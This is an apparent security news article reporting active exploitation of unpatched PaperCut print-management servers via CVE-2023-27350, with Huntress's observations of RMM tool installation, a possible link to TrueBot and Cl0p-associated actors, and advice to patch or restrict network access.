Russian Hackers Suspected In Ongoing Exploitation Of Unpatched PaperCut Servers
PaperCut, a vendor of print management software, claimed it had “evidence to suggest that unpatched servers are being exploited in the wild,” referencing two vulnerability reports from security firm Trend Micro.
ALSO, READ Ukrainian Hackers Spend $25,000 Of Pro-Russian Blogger’s Money On S*x Toys
“PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC,” it further added.
A significant improper access control weakness (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG has been added to the Known Exploited Vulnerabilities (KEV) database by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), prompting this upgrade.
ALSO, READ Shein’s Android App Caught Transmitting Clipboard Data to Remote Servers
Russian Hackers Suspected In Ongoing Exploitation Of Unpatched PaperCut Servers
Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance (RMM) software like Atera and Syncro for persistent access and code execution on the infected hosts.
ALSO, READ CISA Adds 3 Actively Exploited Flaws To KEV Catalog, Including Critical PaperCut Bug
Additional infrastructure analysis has revealed the domain hosting the tools – windowservicecemter[.]com – was registered on April 12, 2023, also hosting malware like TrueBot, although the company said it did not directly detect the deployment of the downloader.
TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.
“While the ultimate goal of the current activity leveraging PaperCut’s software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning,” Huntress researchers said.
Russian Hackers Suspected In Ongoing Exploitation Of Unpatched PaperCut Servers
“Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment.”
ALSO, READ Veeam Backup and Replication Vulnerabilities Being Used in Attacks: CISA Alert
Users are recommended to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is “available to external or internal connections,” to mitigate potential risks.
ALSO, READ Microsoft Issues a DDoS Botnet Cross-Platform Warning as Minecraft Servers Come Under Attack
Customers who are unable to upgrade to a security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.
Be First to Comment